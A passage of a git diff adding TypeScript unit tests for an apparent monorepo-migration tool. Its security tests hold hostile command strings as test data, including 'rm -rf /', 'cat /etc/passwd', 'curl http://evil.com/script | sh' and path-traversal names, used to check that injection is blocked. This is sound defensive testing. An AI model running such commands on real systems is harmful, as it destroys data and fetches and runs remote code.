suggestWorkspaceTool([ + { path: repoA, name: 'repo-a' }, + { path: repoB, name: 'repo-b' }, + ]); + + expect(result.suggestion).toBe('turbo'); + expect(result.confidence).toBe('medium'); + }); + + it('should include alternatives in the result', async () => { + const repoA = await createTempFixture({ + name: 'repo-a', + packageJson: { name: 'repo-a', version: '1.0.0' }, + files: { 'nx.json': '{}' }, + }); + + const result = await suggestWorkspaceTool([ + { path: repoA, name: 'repo-a' }, + ]); + + expect(result.alternatives).toContain('turbo'); + expect(result.alternatives).toContain('none'); + expect(result.alternatives).not.toContain('nx'); + }); +}); + +describe('suggestDependencyStrategy', () => { + it('should suggest hoist with high confidence when no conflicts', () => { + const result = suggestDependencyStrategy([]); + + expect(result.suggestion).toBe('hoist'); + expect(result.confidence).toBe('high'); + expect(result.evidence).toContain('No dependency conflicts detected'); + expect(result.topic).toBe('dependency-strategy'); + }); + + it('should suggest isolate when majority are incompatible', () => { + const conflicts: DependencyConflict[] = [ + { + name: 'react', + versions: [ + { version: '^16.0.0', source: 'repo-a', type: 'dependencies' }, + { version: '^18.0.0', source: 'repo-b', type: 'dependencies' }, + ], + severity: 'incompatible', + }, + { + name: 'vue', + versions: [ + { version: '^2.0.0', source: 'repo-a', type: 'dependencies' }, + { version: '^3.0.0', source: 'repo-b', type: 'dependencies' }, + ], + severity: 'incompatible', + }, + { + name: 'lodash', + versions: [ + { version: '^4.17.20', source: 'repo-a', type: 'dependencies' }, + { version: '^4.17.21', source: 'repo-b', type: 'dependencies' }, + ], + severity: 'minor', + }, + ]; + + const result = suggestDependencyStrategy(conflicts); + + expect(result.suggestion).toBe('isolate'); + expect(result.confidence).toBe('high'); + expect(result.evidence.some((e) => e.includes('incompatible'))).toBe(true); + }); + + it('should suggest hoist when all conflicts are minor', () => { + const conflicts: DependencyConflict[] = [ + { + name: 'lodash', + versions: [ + { version: '^4.17.20', source: 'repo-a', type: 'dependencies' }, + { version: '^4.17.21', source: 'repo-b', type: 'dependencies' }, + ], + severity: 'minor', + }, + { + name: 'uuid', + versions: [ + { version: '^9.0.0', source: 'repo-a', type: 'dependencies' }, + { version: '^9.0.1', source: 'repo-b', type: 'dependencies' }, + ], + severity: 'minor', + }, + ]; + + const result = suggestDependencyStrategy(conflicts); + + expect(result.suggestion).toBe('hoist'); + expect(result.confidence).toBe('high'); + }); + + it('should suggest hoist-with-overrides for mixed severities with some incompatible', () => { + const conflicts: DependencyConflict[] = [ + { + name: 'react', + versions: [ + { version: '^16.0.0', source: 'repo-a', type: 'dependencies' }, + { version: '^18.0.0', source: 'repo-b', type: 'dependencies' }, + ], + severity: 'incompatible', + }, + { + name: 'lodash', + versions: [ + { version: '^4.17.20', source: 'repo-a', type: 'dependencies' }, + { version: '^4.17.21', source: 'repo-b', type: 'dependencies' }, + ], + severity: 'minor', + }, + { + name: 'express', + versions: [ + { version: '^4.18.0', source: 'repo-a', type: 'dependencies' }, + { version: '^4.19.0', source: 'repo-b', type: 'dependencies' }, + ], + severity: 'minor', + }, + { + name: 'axios', + versions: [ + { version: '^0.27.0', source: 'repo-a', type: 'dependencies' }, + { version: '^1.0.0', source: 'repo-b', type: 'dependencies' }, + ], + severity: 'major', + }, + ]; + + const result = suggestDependencyStrategy(conflicts); + + expect(result.suggestion).toBe('hoist-with-overrides'); + expect(result.confidence).toBe('medium'); + }); + + it('should suggest hoist-with-overrides for only major conflicts', () => { + const conflicts: DependencyConflict[] = [ + { + name: 'axios', + versions: [ + { version: '^0.27.0', source: 'repo-a', type: 'dependencies' }, + { version: '^1.0.0', source: 'repo-b', type: 'dependencies' }, + ], + severity: 'major', + }, + ]; + + const result = suggestDependencyStrategy(conflicts); + + expect(result.suggestion).toBe('hoist-with-overrides'); + expect(result.confidence).toBe('medium'); + }); + + it('should include alternatives in the result', () => { + const result = suggestDependencyStrategy([]); + + expect(result.alternatives).toContain('isolate'); + expect(result.alternatives).toContain('hoist-with-overrides'); + expect(result.alternatives).not.toContain('hoist'); + }); +}); diff --git a/tests/unit/analyzers/tooling.test.ts b/tests/unit/analyzers/tooling.test.ts new file mode 100755 index 0000000..135566d --- /dev/null +++ b/tests/unit/analyzers/tooling.test.ts @@ -0,0 +1,84 @@ +import { describe, it, expect, afterEach } from 'vitest'; +import { analyzeTooling } from '../../../src/analyzers/tooling.js'; +import { createTempFixture, cleanupFixtures } from '../../helpers/fixtures.js'; +import { createMockLogger } from '../../helpers/mocks.js'; + +describe('analyzeTooling', () => { + const logger = createMockLogger(); + + afterEach(async () => { + await cleanupFixtures(); + }); + + it('should detect inconsistent TypeScript usage', async () => { + const repoAPath = await createTempFixture({ + name: 'repo-a', + packageJson: { name: 'a', version: '1.0.0' }, + files: { 'tsconfig.json': '{}' }, + }); + const repoBPath = await createTempFixture({ + name: 'repo-b', + packageJson: { name: 'b', version: '1.0.0' }, + }); + + const findings = await analyzeTooling( + [{ path: repoAPath, name: 'repo-a' }, { path: repoBPath, name: 'repo-b' }], + logger, + ); + + const tsInconsistent = findings.find((f) => f.id === 'tooling-inconsistent-typescript'); + expect(tsInconsistent).toBeDefined(); + }); + + it('should flag executable ESLint configs', async () => { + const repoPath = await createTempFixture({ + name: 'repo-js-config', + packageJson: { name: 'test', version: '1.0.0' }, + files: { 'eslint.config.js': 'module.exports = {};' }, + }); + + const findings = await analyzeTooling( + [{ path: repoPath, name: 'repo-js-config' }], + logger, + ); + + const jsConfig = findings.find((f) => f.id === 'tooling-executable-config-eslint'); + expect(jsConfig).toBeDefined(); + expect(jsConfig!.severity).toBe('warn'); + }); + + it('should flag missing test scripts', async () => { + const repoPath = await createTempFixture({ + name: 'repo-no-test', + packageJson: { name: 'test', version: '1.0.0', scripts: { build: 'tsc' } }, + }); + + const findings = await analyzeTooling( + [{ path: repoPath, name: 'repo-no-test' }], + logger, + ); + + const noTest = findings.find((f) => f.id === 'tooling-no-test-repo-no-test'); + expect(noTest).toBeDefined(); + }); + + it('should report malformed package.json instead of silently skipping', async () => { + const repoPath = await createTempFixture({ + name: 'repo-malformed-tooling', + files: { + 'package.json': '{ invalid json !!!', + }, + }); + + const findings = await analyzeTooling( + [{ path: repoPath, name: 'repo-malformed-tooling' }], + logger, + ); + + const malformed = findings.find( + (f) => f.id === 'tooling-malformed-package-json-repo-malformed-tooling' + ); + expect(malformed).toBeDefined(); + expect(malformed?.severity).toBe('warn'); + }); +}); diff --git a/tests/unit/commands/add.test.ts b/tests/unit/commands/add.test.ts new file mode 100755 index 0000000..96b93bc --- /dev/null +++ b/tests/unit/commands/add.test.ts @@ -0,0 +1,100 @@ +import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'; +import path from 'node:path'; +import { generateAddPlan } from '../../../src/strategies/add.js'; +import { createTempFixture, cleanupFixtures } from '../../helpers/fixtures.js'; +import { createMockLogger } from '../../helpers/mocks.js'; + +describe('add command / generateAddPlan', () => { + const logger = createMockLogger(); + + afterEach(async () => { + await cleanupFixtures(); + vi.restoreAllMocks(); + }); + + it('should generate an AddPlan from a local repo', async () => { + // Create a fake monorepo target + const targetPath = await createTempFixture({ + name: 'monorepo-target', + packageJson: { + name: 'test-monorepo', + private: true, + workspaces: ['packages/*'], + }, + directories: ['packages/existing-pkg'], + files: { + 'packages/existing-pkg/package.json': JSON.stringify({ + name: 'existing-pkg', + version: '1.0.0', + dependencies: { lodash: '^4.17.21' }, + }), + }, + }); + + // Create a source repo to add + const sourcePath = await createTempFixture({ + name: 'new-package', + packageJson: { + name: 'new-package', + version: '1.0.0', + dependencies: { lodash: '^4.17.20' }, + }, + files: { + 'src/index.ts': 'export const hello = "world";', + }, + }); + + const plan = await generateAddPlan(sourcePath, { + to: targetPath, + packagesDir: 'packages', + conflictStrategy: 'highest', + packageManager: 'pnpm', + }, logger); + + expect(plan.schemaVersion).toBe(1); + expect(plan.sourceRepo).toBeDefined(); + expect(plan.sourceRepo.name).toContain('new-package'); + expect(plan.targetMonorepo).toBe(targetPath); + expect(plan.packagesDir).toBe('packages'); + expect(plan.operations.length).toBeGreaterThan(0); + expect(plan.operations[0].type).toBe('copy'); + expect(plan.createdAt).toBeDefined(); + }); + + it('should throw if target monorepo does not exist', async () => { + const sourcePath = await createTempFixture({ + name: 'some-repo', + packageJson: { name: 'some-repo', version: '1.0.0' }, + }); + + await expect( + generateAddPlan(sourcePath, { + to: '/nonexistent/path', + packagesDir: 'packages', + conflictStrategy: 'highest', + packageManager: 'pnpm', + }, logger), + ).rejects.toThrow('Target monorepo does not exist'); + }); + + it('should throw if target has no package.json', async () => { + const targetPath = await createTempFixture({ + name: 'no-pkg-target', + directories: ['packages'], + }); + + const sourcePath = await createTempFixture({ + name: 'some-repo', + packageJson: { name: 'some-repo', version: '1.0.0' }, + }); + + await expect( + generateAddPlan(sourcePath, { + to: targetPath, + packagesDir: 'packages', + conflictStrategy: 'highest', + packageManager: 'pnpm', + }, logger), + ).rejects.toThrow('No package.json found'); + }); +}); diff --git a/tests/unit/commands/archive.test.ts b/tests/unit/commands/archive.test.ts new file mode 100755 index 0000000..df97701 --- /dev/null +++ b/tests/unit/commands/archive.test.ts @@ -0,0 +1,45 @@ +import { describe, it, expect } from 'vitest'; +import { generateArchivePlan, generateReadmeDeprecationPatch } from '../../../src/strategies/archive.js'; + +describe('archive command / generateArchivePlan', () => { + it('should generate README deprecation patches without a token', () => { + const patch = generateReadmeDeprecationPatch('my-lib', 'https://github.com/org/monorepo'); + expect(patch).toContain('--- a/README.md'); + expect(patch).toContain('+++ b/README.md'); + expect(patch).toContain('migrated to a monorepo'); + expect(patch).toContain('https://github.com/org/monorepo'); + expect(patch).toContain('my-lib'); + }); + + it('should generate an ArchivePlan from repo inputs', async () => { + const plan = await generateArchivePlan( + ['owner/repo-a', 'owner/repo-b'], + 'https://github.com/org/monorepo', + ); + + expect(plan.schemaVersion).toBe(1); + expect(plan.repos).toHaveLength(2); + expect(plan.repos[0].name).toBe('repo-a'); + expect(plan.repos[1].name).toBe('repo-b'); + expect(plan.monorepoUrl).toBe('https://github.com/org/monorepo'); + expect(plan.repos[0].readmePatch).toContain('migrated to a monorepo'); + expect(plan.apiOperations).toBeUndefined(); + }); + + it('should include API operations when tokenFromEnv is true', async () => { + const plan = await generateArchivePlan( + ['owner/repo-a'], + 'https://github.com/org/monorepo', + { tokenFromEnv: true }, + ); + + expect(plan.apiOperations).toHaveLength(1); + expect(plan.apiOperations![0].action).toBe('archive'); + }); + + it('should throw for invalid repo sources', async () => { + await expect( + generateArchivePlan([], 'https://github.com/org/monorepo'), + ).rejects.toThrow(); + }); +}); diff --git a/tests/unit/commands/migrate-branch.test.ts b/tests/unit/commands/migrate-branch.test.ts new file mode 100755 index 0000000..938e36d --- /dev/null +++ b/tests/unit/commands/migrate-branch.test.ts @@ -0,0 +1,42 @@ +import { describe, it, expect, vi, afterEach } from 'vitest'; +import { checkBranchMigratePrerequisites, branchMigrateDryRun } from '../../../src/strategies/migrate-branch.js'; + +describe('migrate-branch command', () => { + afterEach(() => { + vi.restoreAllMocks(); + }); + + describe('checkBranchMigratePrerequisites', () => { + it('should report issues for non-existent source', async () => { + const result = await checkBranchMigratePrerequisites( + '/nonexistent/source', + '/nonexistent/target', + 'subtree', + ); + expect(result.ok).toBe(false); + expect(result.issues.length).toBeGreaterThan(0); + expect(result.issues.some((i) => i.includes('Source'))).toBe(true); + }); + + it('should accept valid paths', async () => { + // Use test fixture paths that exist + const result = await checkBranchMigratePrerequisites( + process.cwd(), // Current dir is likely a git repo + process.cwd(), + 'subtree', + ); + // Should at least not fail on path existence + // Might fail on shallow clone check depending on env + expect(result.issues.every((i) => !i.includes('not found'))).toBe(true); + }); + }); + + describe('branchMigrateDryRun', () => { + it('should return zero counts for non-git directory', async () => { + const result = await branchMigrateDryRun('/tmp', 'main'); + expect(result.commitCount).toBe(0); + expect(result.estimatedTime).toBe('unknown'); + expect(result.contributors).toEqual([]); + }); + }); +}); diff --git a/tests/unit/commands/ui.test.ts b/tests/unit/commands/ui.test.ts new file mode 100644 index 0000000..b7ce21c --- /dev/null +++ b/tests/unit/commands/ui.test.ts @@ -0,0 +1,71 @@ +import { EventEmitter } from 'node:events'; +import { describe, it, expect, vi, beforeEach } from 'vitest'; +import { CliExitError } from '../../../src/utils/errors.js'; + +const createServerMock = vi.hoisted(() => vi.fn()); +const createLoggerMock = vi.hoisted(() => vi.fn()); + +vi.mock('../../../src/server/index.js', () => ({ + createServer: createServerMock, +})); + +vi.mock('../../../src/utils/logger.js', () => ({ + createLogger: createLoggerMock, +})); + +vi.mock('node:child_process', () => ({ + execFile: vi.fn(), +})); + +import { uiCommand } from '../../../src/commands/ui.js'; + +class MockServer extends EventEmitter { + address() { + return { port: 3847 }; + } +} + +describe('uiCommand', () => { + beforeEach(() => { + vi.clearAllMocks(); + createLoggerMock.mockReturnValue({ + success: vi.fn(), + info: vi.fn(), + warn: vi.fn(), + error: vi.fn(), + debug: vi.fn(), + log: vi.fn(), + }); + }); + + it('throws CliExitError for invalid port input', async () => { + await expect(uiCommand({ port: 'invalid', open: false, verbose: false })).rejects.toBeInstanceOf(CliExitError); + expect(createServerMock).not.toHaveBeenCalled(); + }); + + it('rejects with CliExitError when server emits EADDRINUSE', async () => { + const server = new MockServer(); + createServerMock.mockReturnValue({ server, token: 'token-abc' }); + + const promise = uiCommand({ port: '3847', open: false, verbose: false }); + setImmediate(() => { + const err = Object.assign(new Error('port in use'), { code: 'EADDRINUSE' }); + server.emit('error', err); + }); + + await expect(promise).rejects.toBeInstanceOf(CliExitError); + }); + + it('resolves when server closes cleanly', async () => { + const server = new MockServer(); + createServerMock.mockReturnValue({ server, token: 'token-abc' }); + + const promise = uiCommand({ port: '3847', open: false, verbose: false }); + setImmediate(() => { + server.emit('listening'); + server.emit('close'); + }); + + await expect(promise).resolves.toBeUndefined(); + }); +}); diff --git a/tests/unit/commands/verify-checks.test.ts b/tests/unit/commands/verify-checks.test.ts index c7c7c51..e0a99e0 100755 --- a/tests/unit/commands/verify-checks.test.ts +++ b/tests/unit/commands/verify-checks.test.ts @@ -1,4 +1,8 @@ import { describe, it, expect } from 'vitest'; +import path from 'node:path'; +import os from 'node:os'; +import crypto from 'node:crypto'; +import fs from 'fs-extra'; import type { ApplyPlan } from '../../../src/types/index.js'; import type { VerifyContext } from '../../../src/commands/verify-checks.js'; import { @@ -39,6 +43,13 @@ function planCtx(plan: ApplyPlan): VerifyContext { return { plan, dir: null }; } +async function createTempDir(prefix: string): Promise { + const id = crypto.randomBytes(6).toString('hex'); + const dir = path.join(os.tmpdir(), `${prefix}-${id}`); + await fs.ensureDir(dir); + return dir; +} + // --------------------------------------------------------------------------- // checkRootPackageJson // --------------------------------------------------------------------------- @@ -107,6 +118,33 @@ describe('checkWorkspaceConfig', () => { const checks = await checkWorkspaceConfig(planCtx(plan)); expect(checks[0].status).toBe('fail'); }); + + it('returns explicit failure when root package.json cannot be read (dir mode)', async () => { + const dir = await createTempDir('verify-workspace-config'); + try { + await fs.writeFile(path.join(dir, 'package.json'), '{ invalid json }', 'utf-8'); + + const checks = await checkWorkspaceConfig({ plan: null, dir }); + expect(checks.find((c) => c.id === 'workspace-config')?.status).toBe('fail'); + expect(checks.find((c) => c.id === 'workspace-config:root-package-json')?.status).toBe('fail'); + } finally { + await fs.remove(dir).catch(() => {}); + } + }); + + it('still reports root package read failure even when pnpm-workspace.yaml exists', async () => { + const dir = await createTempDir('verify-workspace-config'); + try { + await fs.writeFile(path.join(dir, 'package.json'), '{ invalid json }', 'utf-8'); + await fs.writeFile(path.join(dir, 'pnpm-workspace.yaml'), "packages:\n - 'packages/*'\n", 'utf-8'); + + const checks = await checkWorkspaceConfig({ plan: null, dir }); + expect(checks.find((c) => c.id === 'workspace-config')?.status).toBe('pass'); + expect(checks.find((c) => c.id === 'workspace-config:root-package-json')?.status).toBe('fail'); + } finally { + await fs.remove(dir).catch(() => {}); + } + }); }); // --------------------------------------------------------------------------- @@ -139,6 +177,24 @@ describe('checkPackageNames', () => { const checks = await checkPackageNames(planCtx(plan)); expect(checks[0].status).toBe('warn'); }); + + it('fails when package.json files cannot be parsed (dir mode)', async () => { + const dir = await createTempDir('verify-package-names'); + try { + await fs.ensureDir(path.join(dir, 'packages', 'pkg-a')); + await fs.writeFile( + path.join(dir, 'packages', 'pkg-a', 'package.json'), + '{ invalid json }', + 'utf-8' + ); + + const checks = await checkPackageNames({ plan: null, dir }); + expect(checks.find((c) => c.id.startsWith('pkg-read-error:'))?.status).toBe('fail'); + expect(checks.find((c) => c.id === 'pkg-names')?.status).toBe('fail'); + } finally { + await fs.remove(dir).catch(() => {}); + } + }); }); // --------------------------------------------------------------------------- @@ -272,4 +328,18 @@ describe('checkRequiredFields', () => { const enginesCheck = checks.find((c) => c.id === 'root-engines'); expect(enginesCheck?.status).toBe('warn'); }); + + it('fails when root package.json cannot be read (dir mode)', async () => { + const dir = await createTempDir('verify-required-fields'); + try { + await fs.writeFile(path.join(dir, 'package.json'), '{ invalid json }', 'utf-8'); + + const checks = await checkRequiredFields({ plan: null, dir }); + const enginesCheck = checks.find((c) => c.id === 'root-engines'); + expect(enginesCheck?.status).toBe('fail'); + expect(enginesCheck?.message).toContain('Could not read root package.json'); + } finally { + await fs.remove(dir).catch(() => {}); + } + }); }); diff --git a/tests/unit/security/command-injection.test.ts b/tests/unit/security/command-injection.test.ts new file mode 100644 index 0000000..985ef8d --- /dev/null +++ b/tests/unit/security/command-injection.test.ts @@ -0,0 +1,157 @@ +import { describe, it, expect } from 'vitest'; +import { safeExecFile } from '../../../src/utils/exec.js'; + +/** + * Command injection security tests. + * + * These verify that safeExecFile (which uses execFile with shell: false) + * cannot be exploited via shell metacharacters, command substitution, + * pipe chains, or environment variable expansion — because no shell + * interpreter is involved. + */ + +describe('safeExecFile – shell injection prevention', () => { + async function runLiteral(args: string[]): Promise { + const result = await safeExecFile( + process.execPath, + ['-e', 'process.stdout.write(process.argv.slice(1).join(" "))', ...args], + ); + return result.stdout; + } + + it('should treat shell metacharacters as literal arguments', async () => { + // If a shell were invoked, "hello; rm -rf /" would execute two commands. + // With execFile(shell:false), it's a single literal argument to echo. + const stdout = await runLiteral(['hello; rm -rf /']); + expect(stdout).toBe('hello; rm -rf /'); + }); + + it('should treat pipe operator as literal text', async () => { + const stdout = await runLiteral(['hello | cat /etc/passwd']); + expect(stdout).toBe('hello | cat /etc/passwd'); + }); + + it('should treat command substitution as literal text', async () => { + const stdout = await runLiteral(['$(whoami)']); + expect(stdout).toBe('$(whoami)'); + }); + + it('should treat backtick substitution as literal text', async () => { + const stdout = await runLiteral(['`whoami`']); + expect(stdout).toBe('`whoami`'); + }); + + it('should treat environment variable expansion as literal text', async () => { + const stdout = await runLiteral(['$HOME']); + expect(stdout).toBe('$HOME'); + }); + + it('should treat ampersand background operator as literal text', async () => { + const stdout = await runLiteral(['hello & echo injected']); + expect(stdout).toBe('hello & echo injected'); + }); + + it('should treat redirects as literal text', async () => { + const stdout = await runLiteral(['hello > /tmp/evil']); + expect(stdout).toBe('hello > /tmp/evil'); + }); + + it('should treat newline-separated commands as single argument', async () => { + const stdout = await runLiteral(['hello\nwhoami']); + // echo outputs the literal string including the newline + expect(stdout).toContain('hello'); + expect(stdout).toContain('whoami'); + }); + + it('should pass arguments with special characters safely', async () => { + const stdout = await runLiteral(['"quotes"', "'singles'", '\\backslash']); + expect(stdout).toContain('"quotes"'); + expect(stdout).toContain("'singles'"); + expect(stdout).toContain('\\backslash'); + }); +}); + +describe('safeExecFile – install command whitelist', () => { + // Re-implement the whitelist check from apply.ts for direct testing + const ALLOWED_INSTALL_EXECUTABLES = new Set(['pnpm', 'npm', 'yarn', 'bun', 'npx']); + + function validateInstallCommand(cmd: string): { exe: string; args: string[] } { + const parts = cmd.split(/\s+/).filter(Boolean); + if (parts.length === 0) { + throw new Error('Install command is empty'); + } + const exe = parts[0]; + if (!ALLOWED_INSTALL_EXECUTABLES.has(exe)) { + throw new Error( + `Install command executable "${exe}" is not allowed. ` + + `Allowed executables: ${[...ALLOWED_INSTALL_EXECUTABLES].join(', ')}` + ); + } + return { exe, args: parts.slice(1) }; + } + + it('should allow pnpm install', () => { + const { exe, args } = validateInstallCommand('pnpm install --ignore-scripts'); + expect(exe).toBe('pnpm'); + expect(args).toEqual(['install', '--ignore-scripts']); + }); + + it('should allow npm install', () => { + const { exe, args } = validateInstallCommand('npm install --ignore-scripts'); + expect(exe).toBe('npm'); + expect(args).toEqual(['install', '--ignore-scripts']); + }); + + it('should allow yarn install', () => { + const { exe, args } = validateInstallCommand('yarn install --ignore-scripts'); + expect(exe).toBe('yarn'); + expect(args).toEqual(['install', '--ignore-scripts']); + }); + + it('should allow bun install', () => { + const { exe } = validateInstallCommand('bun install'); + expect(exe).toBe('bun'); + }); + + it('should reject arbitrary executables', () => { + expect(() => validateInstallCommand('rm -rf /')).toThrow('not allowed'); + expect(() => validateInstallCommand('curl http://evil.com/script | sh')).toThrow('not allowed'); + expect(() => validateInstallCommand('bash -c "evil"')).toThrow('not allowed'); + expect(() => validateInstallCommand('python -c "import os; os.system(\'rm -rf /\')"')).toThrow('not allowed'); + }); + + it('should reject empty command', () => { + expect(() => validateInstallCommand('')).toThrow('empty'); + expect(() => validateInstallCommand(' ')).toThrow('empty'); + }); + + it('should reject commands with path prefixes', () => { + expect(() => validateInstallCommand('/usr/bin/pnpm install')).toThrow('not allowed'); + expect(() => validateInstallCommand('./node_modules/.bin/pnpm install')).toThrow('not allowed'); + }); + + it('should reject commands disguised as allowed ones', () => { + expect(() => validateInstallCommand('pnpm-evil install')).toThrow('not allowed'); + expect(() => validateInstallCommand('npx-custom install')).toThrow('not allowed'); + }); +}); + +describe('safeExecFile – timeout and resource limits', () => { + it('should enforce timeout on long-running commands', async () => { + await expect( + safeExecFile(process.execPath, ['-e', 'setTimeout(() => {}, 60_000)'], { timeout: 200 }) + ).rejects.toThrow(); + }); + + it('should not pass shell: true', async () => { + // Verify that attempting shell features fails (they are literal) + // This is the definitive test: if shell were true, "echo hello && echo world" + // would output two lines. With shell:false, echo gets "hello", "&&", "echo", "world" + // as separate arguments. + const result = await safeExecFile( + process.execPath, + ['-e', 'process.stdout.write(process.argv.slice(1).join(" "))', 'hello', '&&', 'echo', 'world'], + ); + expect(result.stdout).toBe('hello && echo world'); + }); +}); diff --git a/tests/unit/security/credential-redaction.test.ts b/tests/unit/security/credential-redaction.test.ts new file mode 100644 index 0000000..ce4c5a6 --- /dev/null +++ b/tests/unit/security/credential-redaction.test.ts @@ -0,0 +1,182 @@ +import { describe, it, expect } from 'vitest'; +import { redact, redactUrl, redactTokens } from '../../../src/utils/redact.js'; + +/** + * Credential redaction security tests. + * + * These verify that tokens, passwords, and credentials are + * properly stripped from URLs, error messages, and log output + * before they can be exposed to users or written to disk. + */ + +describe('redactUrl – URL credential stripping', () => { + it('should redact username:password from HTTPS URLs', () => { + expect(redactUrl('https://user:pass@github.com/org/repo')).toBe( + 'https://***@github.com/org/repo' + ); + }); + + it('should redact token-only credentials from HTTPS URLs', () => { + expect(redactUrl('https://ghp_abc123def456ghi789jkl012mno345pqr678@github.com/org/repo')).toBe( + 'https://***@github.com/org/repo' + ); + }); + + it('should redact credentials from git:// URLs', () => { + expect(redactUrl('git://user:token@example.com/repo.git')).toBe( + 'git://***@example.com/repo.git' + ); + }); + + it('should not modify SSH URLs (no credentials in URL)', () => { + expect(redactUrl('git@github.com:owner/repo.git')).toBe( + 'git@github.com:owner/repo.git' + ); + }); + + it('should not modify local paths', () => { + expect(redactUrl('/local/path/to/repo')).toBe('/local/path/to/repo'); + }); + + it('should not modify URLs without credentials', () => { + expect(redactUrl('https://github.com/org/repo')).toBe( + 'https://github.com/org/repo' + ); + }); + + it('should handle multiple URLs in one string', () => { + const input = 'cloning https://user:pass@host1.com/a and https://token@host2.com/b'; + const result = redactUrl(input); + expect(result).toBe('cloning https://***@host1.com/a and https://***@host2.com/b'); + }); +}); + +describe('redactTokens – known token pattern stripping', () => { + it('should redact GitHub personal access tokens (ghp_)', () => { + const token = 'ghp_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklm'; + expect(redactTokens(`token: ${token}`)).toBe('token: ***'); + }); + + it('should redact GitHub OAuth tokens (gho_)', () => { + const token = 'gho_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklm'; + expect(redactTokens(`auth: ${token}`)).toBe('auth: ***'); + }); + + it('should redact GitHub user-to-server tokens (ghu_)', () => { + const token = 'ghu_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklm'; + expect(redactTokens(token)).toBe('***'); + }); + + it('should redact GitHub server-to-server tokens (ghs_)', () => { + const token = 'ghs_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklm'; + expect(redactTokens(token)).toBe('***'); + }); + + it('should redact GitHub refresh tokens (ghr_)', () => { + const token = 'ghr_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklm'; + expect(redactTokens(token)).toBe('***'); + }); + + it('should redact GitLab personal access tokens (glpat-)', () => { + const token = 'glpat-ABCDEFGHIJKLMNOPQRSTUVWXYZab'; + expect(redactTokens(`GL_TOKEN=${token}`)).toBe('GL_TOKEN=***'); + }); + + it('should redact npm tokens (npm_)', () => { + const token = 'npm_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklm'; + expect(redactTokens(`//registry.npmjs.org/:_authToken=${token}`)).toBe( + '//registry.npmjs.org/:_authToken=***' + ); + }); + + it('should not redact text that merely starts with a token prefix', () => { + // Short strings below minimum length should not match + expect(redactTokens('ghp_short')).toBe('ghp_short'); + expect(redactTokens('glpat-short')).toBe('glpat-short'); + expect(redactTokens('npm_short')).toBe('npm_short'); + }); + + it('should redact multiple tokens in one string', () => { + const ghp = 'ghp_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklm'; + const npm = 'npm_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklm'; + expect(redactTokens(`GH=${ghp} NPM=${npm}`)).toBe('GH=*** NPM=***'); + }); + + it('should not modify strings without tokens', () => { + expect(redactTokens('normal log message')).toBe('normal log message'); + expect(redactTokens('')).toBe(''); + }); +}); + +describe('redact – combined URL + token redaction', () => { + it('should redact both URL credentials and inline tokens', () => { + const ghp = 'ghp_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklm'; + const input = `cloning https://${ghp}@github.com/org/repo (token: ${ghp})`; + const result = redact(input); + expect(result).not.toContain(ghp); + expect(result).toContain('***@github.com/org/repo'); + expect(result).toContain('token: ***'); + }); + + it('should handle error messages with embedded credentials', () => { + const errorMsg = 'fatal: Authentication failed for https://user:password123@github.com/org/repo.git'; + const result = redact(errorMsg); + expect(result).not.toContain('password123'); + expect(result).not.toContain('user:password123'); + expect(result).toContain('***@github.com'); + }); + + it('should handle git clone failure messages', () => { + const glpat = 'glpat-ABCDEFGHIJKLMNOPQRSTUV'; + const errorMsg = `Cloning into '/tmp/repo'...\nfatal: could not read Username for 'https://gitlab.com': ${glpat}`; + const result = redact(errorMsg); + expect(result).not.toContain(glpat); + }); +}); + +describe('credential leak prevention – plan serialization', () => { + it('should not include auth tokens in plan JSON', () => { + // Simulate a plan object — verify it has no credential fields + const plan = { + version: 1, + sources: [ + { name: 'repo-a', path: '/tmp/work/repo-a' }, + { name: 'repo-b', path: '/tmp/work/repo-b' }, + ], + packagesDir: 'packages', + rootPackageJson: { + name: 'monorepo', + private: true, + devDependencies: { typescript: '^5.0.0' }, + }, + files: [ + { relativePath: 'pnpm-workspace.yaml', content: 'packages:\n - packages/*\n' }, + ], + install: false, + }; + + const serialized = JSON.stringify(plan); + + // Common credential field names + for (const field of ['token', 'password', 'secret', 'credential', 'auth', 'apiKey']) { + expect(serialized.toLowerCase()).not.toContain(field); + } + + // Common token prefixes + for (const prefix of ['ghp_', 'gho_', 'ghu_', 'ghs_', 'ghr_', 'glpat-', 'npm_']) { + expect(serialized).not.toContain(prefix); + } + }); + + it('should use local paths, never remote URLs with credentials', () => { + const sources = [ + { name: 'repo', path: '/tmp/monotize-work/repo' }, + ]; + + for (const source of sources) { + expect(source.path).not.toMatch(/^https?:\/\//); + expect(source.path).not.toContain('@'); + expect(source.path).not.toMatch(/ghp_|gho_|ghu_|ghs_|ghr_|glpat-|npm_/); + } + }); +}); diff --git a/tests/unit/security/input-sanitization.test.ts b/tests/unit/security/input-sanitization.test.ts new file mode 100644 index 0000000..770cee9 --- /dev/null +++ b/tests/unit/security/input-sanitization.test.ts @@ -0,0 +1,172 @@ +import path from 'node:path'; +import { describe, it, expect } from 'vitest'; +import { + isValidPackageName, + sanitizePackageName, + parseRepoSource, +} from '../../../src/utils/validation.js'; + +/** + * Input sanitization security tests. + * + * These verify that user-provided inputs (package names, repo paths, + * URLs) are properly validated and sanitized before use. + */ + +describe('isValidPackageName – malicious input rejection', () => { + it('should reject names with path traversal sequences', () => { + expect(isValidPackageName('../evil')).toBe(false); + expect(isValidPackageName('../../etc/passwd')).toBe(false); + expect(isValidPackageName('packages/../../../tmp')).toBe(false); + }); + + it('should reject names with shell metacharacters', () => { + expect(isValidPackageName('pkg; rm -rf /')).toBe(false); + expect(isValidPackageName('pkg$(whoami)')).toBe(false); + expect(isValidPackageName('pkg`id`')).toBe(false); + expect(isValidPackageName('pkg | cat /etc/passwd')).toBe(false); + }); + + it('should reject names with HTML/XSS payloads', () => { + expect(isValidPackageName('')).toBe(false); + expect(isValidPackageName('pkg">')).toBe(false); + }); + + it('should reject names with null bytes', () => { + expect(isValidPackageName('pkg\x00evil')).toBe(false); + }); + + it('should reject names exceeding 214 characters', () => { + const longName = 'a'.repeat(215); + expect(isValidPackageName(longName)).toBe(false); + }); + + it('should reject names with uppercase', () => { + 